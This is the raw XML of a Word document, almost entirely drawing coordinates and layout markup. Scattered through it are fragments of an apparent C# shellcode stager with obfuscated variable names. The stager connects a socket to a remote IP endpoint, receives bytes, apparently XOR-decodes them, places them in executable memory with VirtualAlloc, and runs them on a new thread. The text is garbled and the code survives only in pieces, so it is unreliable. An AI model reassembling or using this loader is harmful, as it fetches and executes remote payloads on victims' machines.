,4053,14011,4055,14011,4057,14011,4059,14011,4062,14011,4064,14011,4066,14011,4068,14011,4071,14011,4073,14011,4076,14011,4078,14011,4081,14011,4083,14011,4086,14011,4089,14011,4092,14011,4094,14011,4097,14011,4100,14011,4103,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14011,4106,14012,4106,14012,4106,14012,4106,14012,4106,14012,4106,14012,4106,14012,4106,14013,4106,14013,4106,14013,4106,14013,4106,14014,4106,14014,4106,14014,4106,14015,4106,14015,4106,14016,4106,14016,4106,14017,4106,14017,4106,14018,4106,14018,4106,14019,4106,14019,4106,14020,4106,14021,4106,14021,4106,14022,4106,14023,4106,14024,4106,14025,4106,14026,4106,14027,4106,14028,4106,14029,4106,14030,4106,14031,4106,14032,4106,14034,4106,14035,4106,14036,4106,14038,4106,14039,4106,14041,4106,14042,4106,14044,4106,14045,4106,14047,4106,14049,4106,14051,4106,14053,4106,14055,4106,14057,4106,14059,4106,14061,4106,14063,4106,14065,4106,14068,4106,14070,4106,14072,4106,14075,4106,14078,4106,14080,4106,14083,4106,14086,4106,14089,4106,14092,4106,14095,4106,14098,4106,14101,4106,14104,4106,14107,4106,14111,4106,14114,4106,14118,4106,14121,4106,14125,4106,14129,4106,14133,4106,14137,4106,14141,4106,14145,4106,14149,4106,14154,4106,14158,4106,14162,4106,14167,4106,14172,4106,14176,4106,14181,4106,14186,4106,14191,4106,14197,4106,14202,4106,14207,4106,14213,4106,14218,4106,14224,4106,14230,4106,14235,4106,14241,4106,14247,4106,14254,4106,14260,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4106,14266,4105,14266,4105,14266,4105,14266,4105,14266,4105,14266,4105,14266,4105,14266,4105,14266,4105,14266,4104,14266,4104,14266,4104,14266,4104,14266,4104,14266,4103,14266,4103,14266,4103,14266,4102,14266,4102,14266,4102,14266,4102,14266,4101,14266,4101,14266,4100,14266,4100,14266,4100,14266,4099,14266,4099,14266,4098,14266,4098,14266,4097,14266,4097,14266,4096,14266,4095,14266,4095,14266,4094,14266,4094,14266,4093,14266,4092,14266,4091,14266,4091,14266,4090,14266,4089,14266,4088,14266,4087,14266,4087,14266,4086,14266,4085,14266,4084,14266,4083,14266,4082,14266,4081,14266,4079,14266,4078,14266,4077,14266,4076,14266,4075,14266,4074,14266,4072,14266,4071,14266,4070,14266,4068,14266,4067,14266,4065,14266,4064,14266,4062,14266,4061,14266,4059,14266,4058,14266,4056,14266,4054,14266,4052,14266,4051,14266,4049,14266,4047,14266,4045,14266,4043,14266,4041,14266,4039,14266,4037,14266,4035,14266,4033,14266,4030,14266,4028,14266,4026,14266,4024,14266,4021,14266,4019,14266,4016,14266,4014,14266,4011,14266,4009,14266,4006,14266,4003,14266,4001,14266,3998,14266,3995,14266,3992,14266,3989,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14266,3986,14265,3986,14265,3986,14265,3986,14265,3986,14265,3986,14265,3986,14264,3986,14264,3986,14264,3986,14264,3986,14263,3986,14263,3986,14262,3986,14262,3986,14262,3986,14261,3986,14261,3986,14260,3986,14260,3986,14259,3986,14259,3986,14258,3986,14257,3986,14257,3986,14256,3986,14255,3986,14254,3986,14253,3986,14252,3986,14251,3986,14250,3986,14249,3986,14248,3986,14247,3986,14246,3986,14245,3986,14244,3986,14242,3986,14241,3986,14240,3986,14238,3986,14237,3986,14235,3986,14233,3986,14232,3986,14230,3986,14228,3986,14227,3986,14225,3986,14223,3986,14221,3986,14219,3986,14216,3986,14214,3986,14212,3986,14210,3986,14207,3986,14205,3986,14202,3986,14200,3986,14197,3986,14194,3986,14192,3986,14189,3986,14186,3986,14183,3986,14180,3986,14176,3986,14173,3986,14170,3986,14166,3986,14163,3986,14159,3986,14156,3986,14152,3986,14148,3986,14144,3986,14140,3986,14136,3986,14132,3986,14128,3986,14124,3986,14119,3986,14115,3986,14110,3986,14106,3986,14101,3986,14096,3986,14091,3986,14086,3986,14081,3986,14075,3986,14070,3986,14065,3986,14059,3986,14053,3986,14048,3986,14042,3986,14036,3986,14030,3986,14024,3986,14017,3986,1401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950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jkmhGrfzsKQeCG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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VirtualAlloc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YUtHhF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VenifEUR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NIHbxnOmrgiBGL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KIheHEUxhAfOI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GDmElasSZbx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rGECFEZG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UyBSrAIp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sPEeJlufmodo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jmzHRQU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SnpQPGMvDbMOGmn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WaitForSingleObje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pRIwbzTTS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eRLAWWYQnq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ErlgHH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ZwznjBJY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KsMEeo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{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4681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IPEndPoint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qAmSXHOKCbGlysd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IPEndPoint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IPAddress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Parse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ZwznjBJY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KsMEeo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XXxIoIXNCle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AddressFamily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InterNetwork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SocketTyp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Stream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ProtocolType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XXxIoIXNCle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Connect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qAmSXHOKCbGlysd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catch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UmquAHRnhhpuE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XXxIoIXNCle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UmquAHRnhhpuE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kFVRSNnpj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ToInt32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UmquAHRnhhpuE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qaYyFq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kFVRSNnpj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SRCDELibA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while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SRCDELibA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kFVRSNnpj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SRCDELibA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XXxIoIXNCle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qaYyFq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SRCDELibA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kFVRSNnpj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SRCDELibA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?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kFVRSNnpj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SRCDELibA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4561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TvvzOgPLqwcFFv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GetBytes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int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XXxIoIXNCle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Handle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Array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Copy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TvvzOgPLqwcFFv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qaYyFq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qaYyFq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0xBF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qaYyFq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cmMtjerv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HEHUjJhkrNS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HEHUjJhkrNS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!=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WcpKfU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VirtualAlloc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HEHUjJhkrNS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0x1000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x40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Marshal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Copy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HEHUjJhkrNS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WcpKfU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HEHUjJhkrNS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UhxtIFnlOQatrk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Zero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wdjYKFDCCf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XVYcQxpp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Zero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UhxtIFnlOQatrk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WcpKfU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XVYcQxpp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wdjYKFDC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Cf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350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WaitForSingleObject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UhxtIFnlOQatrk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0xFFFFFFFF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}}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LCIUtRN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297.0pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:106.278pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,2125">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:2125" coordorigin="10402,0" coordsize="0,2125" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,2,10402,3,10402,4,10402,5,10402,6,10402,7,10402,8,10402,10,10402,11,10402,13,10402,15,10402,17,10402,19,10402,22,10402,24,10402,27,10402,30,10402,34,10402,37,10402,41,10402,45,10402,49,10402,54,10402,58,10402,63,10402,69,10402,74,10402,80,10402,86,10402,93,10402,100,10402,107,10402,114,10402,122,10402,130,10402,139,10402,148,10402,157,10402,167,10402,177,10402,187,10402,198,10402,209,10402,221,10402,233,10402,246,10402,259,10402,272,10402,286,10402,300,10402,315,10402,330,10402,346,10402,362,10402,379,10402,396,10402,414,10402,432,10402,451,10402,470,10402,490,10402,511,10402,532,10402,553,10402,575,10402,598,10402,621,10402,645,10402,670,10402,695,10402,721,10402,747,10402,774,10402,802,10402,830,10402,859,10402,889,10402,919,10402,950,10402,982,10402,1014,10402,1047,10402,1081,10402,1115,10402,1151,10402,1187,10402,1223,10402,1261,10402,1299,10402,1338,10402,1378,10402,1418,10402,1460,10402,1502,10402,1545,10402,1588,10402,1633,10402,1678,10402,1725,10402,1772,10402,1819,10402,1868,10402,1918,10402,1968,10402,2020,10402,2072,10402,2125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7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999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999l1517,999,1517,999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7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20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:410" coordorigin="1490,1710" coordsize="8990,41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6,10484,1736,10484,1736,10484,1736,10484,1736,10484,1736,10484,1737,10484,1737,10484,1737,10484,1738,10484,1738,10484,1738,10484,1739,10484,1739,10484,1740,10484,1741,10484,1741,10484,1742,10484,1742,10484,1743,10484,1744,10484,1745,10484,1746,10484,1747,10484,1748,10484,1749,10484,1750,10484,1751,10484,1752,10484,1753,10484,1755,10484,1756,10484,1757,10484,1759,10484,1760,10484,1762,10484,1764,10484,1766,10484,1767,10484,1769,10484,1771,10484,1773,10484,1776,10484,1778,10484,1780,10484,1782,10484,1785,10484,1787,10484,1790,10484,1793,10484,1796,10484,1798,10484,1801,10484,1805,10484,1808,10484,1811,10484,1814,10484,1818,10484,1821,10484,1825,10484,1829,10484,1833,10484,1837,10484,1841,10484,1845,10484,1849,10484,1853,10484,1858,10484,1863,10484,1867,10484,1872,10484,1877,10484,1882,10484,1887,10484,1893,10484,1898,10484,1904,10484,1909,10484,1915,10484,1921,10484,1927,10484,1933,10484,1940,10484,1946,10484,1953,10484,1960,10484,1966,10484,1973,10484,1981,10484,1988,10484,1995,10484,2003,10484,2011,10484,2019,10484,2027,10484,2035,10484,2043,10484,2052,10484,2060,10484,2069,10484,2078,10484,2087,10484,2096,10484,2106,10484,2115,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10483,2125,10482,2125,10482,2125,10480,2125,10479,2125,10477,2125,10475,2125,10473,2125,10470,2125,10466,2125,10462,2125,10458,2125,10453,2125,10448,2125,10442,2125,10435,2125,10428,2125,10419,2125,10411,2125,10401,2125,10391,2125,10379,2125,10367,2125,10354,2125,10340,2125,10326,2125,10310,2125,10293,2125,10275,2125,10256,2125,10236,2125,10215,2125,10192,2125,10168,2125,10143,2125,10117,2125,10090,2125,10061,2125,10031,2125,9999,2125,9966,2125,9931,2125,9895,2125,9858,2125,9819,2125,9778,2125,9735,2125,9691,2125,9646,2125,9598,2125,9549,2125,9498,2125,9445,2125,9391,2125,9334,2125,9275,2125,9215,2125,9153,2125,9088,2125,9022,2125,8953,2125,8883,2125,8810,2125,8735,2125,8658,2125,8578,2125,8497,2125,8413,2125,8326,2125,8238,2125,8146,2125,8053,2125,7957,2125,7859,2125,7758,2125,7654,2125,7548,2125,7439,2125,7328,2125,7214,2125,7097,2125,6977,2125,6855,2125,6730,2125,6602,2125,6471,2125,6337,2125,6201,2125,6061,2125,5918,2125,5773,2125,5624,2125,5472,2125,5317,2125,5159,2125,4997,2125,4833,2125,4665,2125,4494,2125,4319,2125,4141,2125,3960,2125,3776,2125,3587,2125,3396,2125,3201,2125,3002,2125,2800,2125,2594,2125,2385,2125,2172,2125,1955,2125,1734,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2124,1510,2124,1510,2124,1510,2124,1510,2124,1510,2123,1510,2123,1510,2123,1510,2123,1510,2122,1510,2122,1510,2121,1510,2121,1510,2121,1510,2120,1510,2119,1510,2119,1510,2118,1510,2117,1510,2117,1510,2116,1510,2115,1510,2114,1510,2113,1510,2112,1510,2111,1510,2110,1510,2109,1510,2108,1510,2107,1510,2105,1510,2104,1510,2103,1510,2101,1510,2099,1510,2098,1510,2096,1510,2094,1510,2093,1510,2091,1510,2089,1510,2087,1510,2084,1510,2082,1510,2080,1510,2078,1510,2075,1510,2073,1510,2070,1510,2067,1510,2064,1510,2061,1510,2058,1510,2055,1510,2052,1510,2049,1510,2046,1510,2042,1510,2039,1510,2035,1510,2031,1510,2027,1510,2023,1510,2019,1510,2015,1510,2011,1510,2007,1510,2002,1510,1997,1510,1993,1510,1988,1510,1983,1510,1978,1510,1973,1510,1967,1510,1962,1510,1956,1510,1951,1510,1945,1510,1939,1510,1933,1510,1927,1510,1920,1510,1914,1510,1907,1510,1900,1510,1894,1510,1887,1510,1879,1510,1872,1510,1865,1510,1857,1510,1849,1510,1841,1510,1833,1510,1825,1510,1817,1510,1808,1510,1800,1510,1791,1510,1782,1510,1773,1510,1764,1510,1754,1510,1745,1510,1735e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:85.800pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:1030;width:130;height:270" coordorigin="3850,1030" coordsize="130,270" path="m3866,1045l3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3866,1045,3867,1045,3867,1045,3867,1045,3867,1045,3867,1045,3867,1045,3867,1045,3867,1045,3868,1045,3868,1045,3868,1045,3868,1045,3868,1045,3869,1045,3869,1045,3869,1045,3869,1045,3870,1045,3870,1045,3870,1045,3871,1045,3871,1045,3871,1045,3872,1045,3872,1045,3872,1045,3873,1045,3873,1045,3874,1045,3874,1045,3875,1045,3875,1045,3876,1045,3877,1045,3877,1045,3878,1045,3878,1045,3879,1045,3880,1045,3881,1045,3881,1045,3882,1045,3883,1045,3884,1045,3885,1045,3886,1045,3886,1045,3887,1045,3888,1045,3889,1045,3890,1045,3891,1045,3893,1045,3894,1045,3895,1045,3896,1045,3897,1045,3898,1045,3900,1045,3901,1045,3902,1045,3904,1045,3905,1045,3907,1045,3908,1045,3910,1045,3911,1045,3913,1045,3914,1045,3916,1045,3918,1045,3920,1045,3921,1045,3923,1045,3925,1045,3927,1045,3929,1045,3931,1045,3933,1045,3935,1045,3937,1045,3939,1045,3942,1045,3944,1045,3946,1045,3948,1045,3951,1045,3953,1045,3956,1045,3958,1045,3961,1045,3963,1045,3966,1045,3969,1045,3972,1045,3974,1045,3977,1045,3980,1045,3983,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1046,3986,1046,3986,1046,3986,1046,3986,1046,3986,1047,3986,1047,3986,1047,3986,1048,3986,1048,3986,1048,3986,1049,3986,1049,3986,1049,3986,1050,3986,1050,3986,1051,3986,1052,3986,1052,3986,1053,3986,1054,3986,1054,3986,1055,3986,1056,3986,1057,3986,1057,3986,1058,3986,1059,3986,1060,3986,1061,3986,1062,3986,1063,3986,1065,3986,1066,3986,1067,3986,1068,3986,1070,3986,1071,3986,1073,3986,1074,3986,1076,3986,1077,3986,1079,3986,1081,3986,1082,3986,1084,3986,1086,3986,1088,3986,1090,3986,1092,3986,1094,3986,1096,3986,1099,3986,1101,3986,1103,3986,1106,3986,1108,3986,1111,3986,1114,3986,1116,3986,1119,3986,1122,3986,1125,3986,1128,3986,1131,3986,1134,3986,1137,3986,1141,3986,1144,3986,1148,3986,1151,3986,1155,3986,1159,3986,1162,3986,1166,3986,1170,3986,1174,3986,1178,3986,1183,3986,1187,3986,1191,3986,1196,3986,1201,3986,1205,3986,1210,3986,1215,3986,1220,3986,1225,3986,1230,3986,1235,3986,1241,3986,1246,3986,1252,3986,1257,3986,1263,3986,1269,3986,1275,3986,1281,3986,1287,3986,1293,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3984,1300,3984,1300,3984,1300,3984,1300,3984,1300,3983,1300,3983,1300,3983,1300,3983,1300,3982,1300,3982,1300,3982,1300,3981,1300,3981,1300,3981,1300,3980,1300,3980,1300,3980,1300,3979,1300,3979,1300,3978,1300,3978,1300,3977,1300,3977,1300,3976,1300,3975,1300,3975,1300,3974,1300,3973,1300,3973,1300,3972,1300,3971,1300,3971,1300,3970,1300,3969,1300,3968,1300,3967,1300,3966,1300,3966,1300,3965,1300,3964,1300,3963,1300,3962,1300,3961,1300,3959,1300,3958,1300,3957,1300,3956,1300,3955,1300,3953,1300,3952,1300,3951,1300,3950,1300,3948,1300,3947,1300,3945,1300,3944,1300,3942,1300,3941,1300,3939,1300,3937,1300,3936,1300,3934,1300,3932,1300,3931,1300,3929,1300,3927,1300,3925,1300,3923,1300,3921,1300,3919,1300,3917,1300,3915,1300,3913,1300,3910,1300,3908,1300,3906,1300,3904,1300,3901,1300,3899,1300,3896,1300,3894,1300,3891,1300,3889,1300,3886,1300,3883,1300,3880,1300,3878,1300,3875,1300,3872,1300,3869,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1300,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1299,3866,1298,3866,1298,3866,1298,3866,1298,3866,1298,3866,1297,3866,1297,3866,1297,3866,1296,3866,1296,3866,1296,3866,1295,3866,1295,3866,1294,3866,1294,3866,1293,3866,1293,3866,1292,3866,1291,3866,1291,3866,1290,3866,1289,3866,1288,3866,1288,3866,1287,3866,1286,3866,1285,3866,1284,3866,1283,3866,1282,3866,1281,3866,1280,3866,1278,3866,1277,3866,1276,3866,1274,3866,1273,3866,1272,3866,1270,3866,1269,3866,1267,3866,1265,3866,1264,3866,1262,3866,1260,3866,1258,3866,1256,3866,1254,3866,1252,3866,1250,3866,1248,3866,1245,3866,1243,3866,1241,3866,1238,3866,1236,3866,1233,3866,1231,3866,1228,3866,1225,3866,1222,3866,1219,3866,1216,3866,1213,3866,1210,3866,1207,3866,1203,3866,1200,3866,1196,3866,1193,3866,1189,3866,1186,3866,1182,3866,1178,3866,1174,3866,1170,3866,1166,3866,1161,3866,1157,3866,1153,3866,1148,3866,1144,3866,1139,3866,1134,3866,1129,3866,1124,3866,1119,3866,1114,3866,1109,3866,1104,3866,1098,3866,1093,3866,1087,3866,1081,3866,1075,3866,1069,3866,1063,3866,1057,3866,1051,3866,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:282.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5650,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:5650;top:1030;width:130;height:270" coordorigin="5650,1030" coordsize="130,270" path="m5667,1045l5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5668,1045,5668,1045,5668,1045,5668,1045,5668,1045,5668,1045,5668,1045,5668,1045,5669,1045,5669,1045,5669,1045,5669,1045,5669,1045,5670,1045,5670,1045,5670,1045,5670,1045,5671,1045,5671,1045,5671,1045,5672,1045,5672,1045,5673,1045,5673,1045,5673,1045,5674,1045,5674,1045,5675,1045,5675,1045,5676,1045,5676,1045,5677,1045,5677,1045,5678,1045,5679,1045,5679,1045,5680,1045,5681,1045,5681,1045,5682,1045,5683,1045,5684,1045,5685,1045,5686,1045,5686,1045,5687,1045,5688,1045,5689,1045,5690,1045,5691,1045,5692,1045,5693,1045,5695,1045,5696,1045,5697,1045,5698,1045,5699,1045,5701,1045,5702,1045,5703,1045,5705,1045,5706,1045,5708,1045,5709,1045,5711,1045,5712,1045,5714,1045,5715,1045,5717,1045,5719,1045,5721,1045,5722,1045,5724,1045,5726,1045,5728,1045,5730,1045,5732,1045,5734,1045,5736,1045,5738,1045,5740,1045,5742,1045,5745,1045,5747,1045,5749,1045,5752,1045,5754,1045,5757,1045,5759,1045,5762,1045,5764,1045,5767,1045,5770,1045,5772,1045,5775,1045,5778,1045,5781,1045,5784,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1046,5787,1046,5787,1046,5787,1046,5787,1046,5787,1047,5787,1047,5787,1047,5787,1048,5787,1048,5787,1048,5787,1049,5787,1049,5787,1049,5787,1050,5787,1050,5787,1051,5787,1052,5787,1052,5787,1053,5787,1054,5787,1054,5787,1055,5787,1056,5787,1057,5787,1057,5787,1058,5787,1059,5787,1060,5787,1061,5787,1062,5787,1063,5787,1065,5787,1066,5787,1067,5787,1068,5787,1070,5787,1071,5787,1073,5787,1074,5787,1076,5787,1077,5787,1079,5787,1081,5787,1082,5787,1084,5787,1086,5787,1088,5787,1090,5787,1092,5787,1094,5787,1096,5787,1099,5787,1101,5787,1103,5787,1106,5787,1108,5787,1111,5787,1114,5787,1116,5787,1119,5787,1122,5787,1125,5787,1128,5787,1131,5787,1134,5787,1137,5787,1141,5787,1144,5787,1148,5787,1151,5787,1155,5787,1159,5787,1162,5787,1166,5787,1170,5787,1174,5787,1178,5787,1183,5787,1187,5787,1191,5787,1196,5787,1201,5787,1205,5787,1210,5787,1215,5787,1220,5787,1225,5787,1230,5787,1235,5787,1241,5787,1246,5787,1252,5787,1257,5787,1263,5787,1269,5787,1275,5787,1281,5787,1287,5787,1293,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5786,1300,5785,1300,5785,1300,5785,1300,5785,1300,5785,1300,5784,1300,5784,1300,5784,1300,5784,1300,5783,1300,5783,1300,5783,1300,5782,1300,5782,1300,5782,1300,5781,1300,5781,1300,5780,1300,5780,1300,5780,1300,5779,1300,5779,1300,5778,1300,5777,1300,5777,1300,5776,1300,5776,1300,5775,1300,5774,1300,5774,1300,5773,1300,5772,1300,5772,1300,5771,1300,5770,1300,5769,1300,5768,1300,5767,1300,5766,1300,5765,1300,5765,1300,5764,1300,5762,1300,5761,1300,5760,1300,5759,1300,5758,1300,5757,1300,5756,1300,5754,1300,5753,1300,5752,1300,5750,1300,5749,1300,5748,1300,5746,1300,5745,1300,5743,1300,5742,1300,5740,1300,5738,1300,5737,1300,5735,1300,5733,1300,5731,1300,5730,1300,5728,1300,5726,1300,5724,1300,5722,1300,5720,1300,5718,1300,5716,1300,5714,1300,5711,1300,5709,1300,5707,1300,5704,1300,5702,1300,5700,1300,5697,1300,5695,1300,5692,1300,5689,1300,5687,1300,5684,1300,5681,1300,5679,1300,5676,1300,5673,1300,5670,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1299,5667,1298,5667,1298,5667,1298,5667,1298,5667,1298,5667,1297,5667,1297,5667,1297,5667,1296,5667,1296,5667,1296,5667,1295,5667,1295,5667,1294,5667,1294,5667,1293,5667,1293,5667,1292,5667,1291,5667,1291,5667,1290,5667,1289,5667,1288,5667,1288,5667,1287,5667,1286,5667,1285,5667,1284,5667,1283,5667,1282,5667,1281,5667,1280,5667,1278,5667,1277,5667,1276,5667,1274,5667,1273,5667,1272,5667,1270,5667,1269,5667,1267,5667,1265,5667,1264,5667,1262,5667,1260,5667,1258,5667,1256,5667,1254,5667,1252,5667,1250,5667,1248,5667,1245,5667,1243,5667,1241,5667,1238,5667,1236,5667,1233,5667,1231,5667,1228,5667,1225,5667,1222,5667,1219,5667,1216,5667,1213,5667,1210,5667,1207,5667,1203,5667,1200,5667,1196,5667,1193,5667,1189,5667,1186,5667,1182,5667,1178,5667,1174,5667,1170,5667,1166,5667,1161,5667,1157,5667,1153,5667,1148,5667,1144,5667,1139,5667,1134,5667,1129,5667,1124,5667,1119,5667,1114,5667,1109,5667,1104,5667,1098,5667,1093,5667,1087,5667,1081,5667,1075,5667,1069,5667,1063,5667,1057,5667,1051,5667,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:55.500pt;margin-top:151.500pt;width:211.500pt;height:49.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1110,3030" coordsize="4230,990">
        <v:shape style="position:absolute;left:1110;top:3030;width:4230;height:990" coordorigin="1110,3030" coordsize="4230,990" path="m1127,3971l1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3971,1127,3970,1127,3970,1127,3970,1127,3970,1127,3970,1127,3969,1127,3969,1127,3968,1127,3968,1127,3967,1127,3967,1127,3966,1127,3965,1127,3965,1127,3964,1127,3963,1127,3962,1127,3961,1127,3960,1127,3958,1127,3957,1127,3956,1127,3954,1127,3952,1127,3951,1127,3949,1127,3947,1127,3945,1127,3943,1127,3940,1127,3938,1127,3935,1127,3933,1127,3930,1127,3927,1127,3924,1127,3921,1127,3917,1127,3914,1127,3910,1127,3906,1127,3902,1127,3898,1127,3894,1127,3890,1127,3885,1127,3880,1127,3875,1127,3870,1127,3865,1127,3859,1127,3854,1127,3848,1127,3842,1127,3836,1127,3829,1127,3822,1127,3816,1127,3809,1127,3801,1127,3794,1127,3786,1127,3778,1127,3770,1127,3762,1127,3753,1127,3744,1127,3735,1127,3726,1127,3716,1127,3707,1127,3696,1127,3686,1127,3676,1127,3665,1127,3654,1127,3642,1127,3631,1127,3619,1127,3607,1127,3594,1127,3582,1127,3569,1127,3556,1127,3542,1127,3528,1127,3514,1127,3500,1127,3485,1127,3470,1127,3454,1127,3439,1127,3423,1127,3407,1127,3390,1127,3373,1127,3356,1127,3338,1127,3320,1127,3302,1127,3283,1127,3265,1127,3245,1127,3226,1127,3206,1127,3185,1127,3165,1127,3144,1127,3122,1127,3101,1127,3101,1127,3100,1127,3099,1127,3098,1127,3097,1127,3096,1127,3095,1127,3095,1127,3094,1127,3093,1127,3092,1128,3091,1128,3090,1128,3090,1128,3089,1128,3088,1128,3087,1128,3087,1128,3086,1128,3085,1129,3084,1129,3084,1129,3083,1129,3082,1129,3082,1129,3081,1130,3080,1130,3079,1130,3079,1130,3078,1130,3077,1131,3077,1131,3076,1131,3075,1131,3075,1132,3074,1132,3074,1132,3073,1132,3072,1133,3072,1133,3071,1133,3071,1134,3070,1134,3069,1134,3069,1135,3068,1135,3068,1135,3067,1136,3067,1136,3066,1136,3066,1137,3065,1137,3065,1137,3064,1138,3064,1138,3063,1139,3063,1139,3062,1140,3062,1140,3061,1140,3061,1141,3061,1141,3060,1142,3060,1142,3059,1143,3059,1143,3058,1144,3058,1144,3058,1145,3057,1145,3057,1146,3057,1146,3056,1147,3056,1147,3056,1148,3055,1148,3055,1149,3055,1150,3054,1150,3054,1151,3054,1151,3053,1152,3053,1153,3053,1153,3053,1154,3052,1154,3052,1155,3052,1156,3052,1156,3051,1157,3051,1158,3051,1158,3051,1159,3051,1160,3050,1161,3050,1161,3050,1162,3050,1163,3050,1163,3050,1164,3049,1165,3049,1166,3049,1166,3049,1167,3049,1168,3049,1169,3049,1170,3049,1170,3048,1171,3048,1172,3048,1173,3048,1174,3048,1174,3048,1175,3048,1176,3048,1177,3048,1178,3048,1179,3048,1180,3048,1180,3048,1180,3048,1180,3048,1180,3048,1180,3048,1180,3048,1180,3048,1180,3048,1181,3048,1181,3048,1182,3048,1183,3048,1184,3048,1185,3048,1186,3048,1188,3048,1190,3048,1192,3048,1194,3048,1196,3048,1199,3048,1202,3048,1206,3048,1209,3048,1213,3048,1218,3048,1222,3048,1228,3048,1233,3048,1239,3048,1245,3048,1252,3048,1260,3048,1267,3048,1276,3048,1284,3048,1293,3048,1303,3048,1313,3048,1324,3048,1336,3048,1348,3048,1360,3048,1374,3048,1387,3048,1402,3048,1417,3048,1433,3048,1449,3048,1467,3048,1485,3048,1503,3048,1523,3048,1543,3048,1564,3048,1586,3048,1608,3048,1631,3048,1656,3048,1681,3048,1707,3048,1733,3048,1761,3048,1790,3048,1819,3048,1850,3048,1881,3048,1914,3048,1947,3048,1981,3048,2017,3048,2053,3048,2090,3048,2129,3048,2168,3048,2209,3048,2251,3048,2294,3048,2338,3048,2383,3048,2429,3048,2476,3048,2525,3048,2575,3048,2626,3048,2678,3048,2732,3048,2786,3048